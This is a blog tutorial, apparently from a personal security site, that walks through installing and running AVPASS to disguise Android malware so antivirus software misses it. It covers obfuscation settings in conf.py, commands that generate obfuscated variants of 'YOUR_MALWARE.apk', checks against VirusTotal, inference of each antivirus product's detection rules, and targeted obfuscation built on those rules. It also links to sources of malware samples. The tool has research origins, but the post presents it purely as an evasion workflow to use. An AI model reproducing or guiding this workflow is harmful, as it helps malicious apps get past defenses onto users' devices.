i AVPASS – All things in moderation

AVPASS

Last week, I learned a good tool for bypass antivirus on android. Today, I will introduce you to that tool.
It is avpass.

What is avpass?
AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques. AVPASS is not limited to detection features used by detection systems, and can also infer detection rules so that it can disguise any Android malware as a benign application by automatically transforming the APK binary. To prevent leakage of the application logic during transformation, AVPASS provides an Imitation Mode that allows malware developers to safely query curious detection features without sending the entire binary.

AVPASS offers several useful features to transform any Android malware so it can bypass anti-virus software. Below are the main features AVPASS offers:
– APK obfuscation with more than 10 modules
– Feature inference for the detection system by using individual obfuscation
– Rule inference of the detection system by using the 2k factorial experiment
– Targeted obfuscation to bypass a specific detection system
– Safe query support by using Imitation Mode

Install avpass
On ubuntu 16.04 LTS
Download avpass:
Use git:

$ git clone https://github.com/sslab-gatech/avpass.git

$ cd avpass

Install avpass with command:

$ ./install-dep.sh

If the file is not executable. You run command:

$   sudo chmod +x ./install-dep.sh

If this script doesn’t work for your envorinment and if you find any problem regarding library, you can install these libraries manually. Don’t worry. We didn’t use many libraries. These are the list:
– apktool: https://ibotpeaches.github.io/Apktool/
– numpy: http://www.numpy.org/
– PIL: http://www.pythonware.com/products/pil/
– magic: https://pypi.python.org/pypi/python-magic
– python-utils: https://pypi.python.org/pypi/python-utils/2.1.0
– vt: https://pypi.python.org/pypi/virustotal-api

We recommend you to make sure whether two tools (apktool and vt) are working correctly. If you execute commands, you should see these messages.

$ apktool

$ vt

Let’s start from obfuscating individual APK. First you need to set up your obfuscation. If you don’t want, you can simply use default obfuscations which only include Java reflection, String encryption, Variable encryption, Package name change, Method name change, Class name change, and Resource obfuscation.
Open the file: src/conf.py
I use nano. You can use nano or vim.

cd src
sudo nano conf.py

# DEFINED COMMAND: preserve original functionality
STRING         = "python strp.py -f {1}.apk string -c no;"
VARIABLE       = "python strp.py -f {1}.apk variable -c no;"
PCM            = "python pcm.py  -f {1}.apk package -c no;"
BYTECODE       = "python pcm.py  -f {1}.apk insbyte -c no;"
BENIGN_CLASS   = "python pcm.py  -f {1}.apk bclass -c no;"
RESOURCE_IMAGE = "python res.py  -f {1} image -c no;"
RESOURCE_XML   = "python res.py  -f {1} resxml -c no -n no;"
API_INTER      = "python api.py  -f {1}.apk inter -a android -c no;"
BEN_PERMISSION = "python api.py  -f {1}.apk bpermission -c no;"
API_REFLECTION = "python refl.py -f {1}.apk reflect -c no;"

ANTI_DATAFLOW  = "WILL RELEASE AFTER ACADEMIC SUBMISSION PROCESS"
COMPONENT_DIV  = "WILL RELEASE AFTER ACADEMIC SUBMISSION PROCESS"
FAMILY_CHANGER = "WILL RELEASE AFTER ACADEMIC SUBMISSION PROCESS"


# DESTRUCTIVE OBFUSCATIONS: only for inferring feature's impact
RM_RESOURCE_PAYLOAD = "python res.py   -f {1} payload -c no;"
RM_APIS             = "python rmapi.py -f {1}.apk rmall -c no;"
RM_PERMISSION       = "python api.py   -f {1}.apk permission -c no;"


# Obfuscation Group for individual APK disguise
OBFUSCATION_LIST = [API_REFLECTION, STRING, VARIABLE, PCM, \
                   RESOURCE_IMAGE+RESOURCE_XML]


# Inferring Group
INFERRING_LIST  = [API_REFLECTION, STRING, VARIABLE, PCM, BENIGN_CLASS, \
                   RESOURCE_IMAGE+RESOURCE_XML, RM_PERMISSION]

We pre-defined several obfuscation modules here. You can modify OBFUSCATION_LIST for your obfuscation. Note that the order of list is the same as the order of obfuscation. For example, this configuration will start obfuscation from Java Reflection.

Obfuscate individual APK
Let’s test with example. Copy any malware into your src directory. Then run this script:

# generate one individual obfuscated APK
$ python gen_disguise.py -i YOUR_MALWARE.apk individual

Before:

After:

Check your obfuscated malware to VirusTotal:
Upload obfuscated APK

$ vt -f YOUR_MALWARE.apk -j 

Check the result

$ vt -fs YOUR_MALWARE.apk -j 

Finally, you will get result file (JSON format) and check which AV detected your obfuscated malware.

Generate malware variation
Setup

First, make input and output directory and copy your malware into the directory. Check your conf.py to include or exclude necessary obfuscations. Especially, you should modify INFERRING_LIST to define your obfuscation. Then execute gen_variations.py script. For example:

$ cd src
$ mkdir input
$ mkdir output

MODIFY YOUR conf.py

$ cp YOUR_MALWARE ./input/
$ python gen_variations -i input -o output

Input:

Output:

You can download malware samples from:
DREBIN: https://www.sec.cs.tu-bs.de/~danarp/drebin/
VirusShare: https://virusshare.com/

Query to VirusTotal
Did you finish variation generation? If yes, you can query the variations to VirusTotal. Since AVPASS knows about obfuscation by reading filename, you should not change obfuscated filename. You can use these commands to query and get result.

# upload your APK
$ vt -f *.apk -j

After uploading all APKs

# download queried result
$ vt -fs *.apk -j

Inferring AV’s rules
Assumption
1. Generated malware variations and queried the result from VirusTotal
2. Malware variation (APK) and queried result (JSON) are at the same directory

Once you finished query, inferring is simple! Run this script. Please make sure whether you satisfied the assumption above before run the script.

# infer rules, assume that output directory has both APK and JSON
$ python infer_rules.py -i output

What can you see? You can see inferred rule combinations for each AV and also can check whether inferred_rules.pkl is generated.

Obfuscate by using inferred rules
You can do targeted obfuscation using this command:

# Run targeted obfuscation
$ sudo python gen_disguise -i YOUR_MALWARE withrule -o OUTPUT_DIR

If there is no problem so far, you will see this question from command line.

You can start to install and use the features of avpass. Hope my article will help you. Please comment if there are any errors during your installation. Thank you!

Reference: https://github.com

Leave a Reply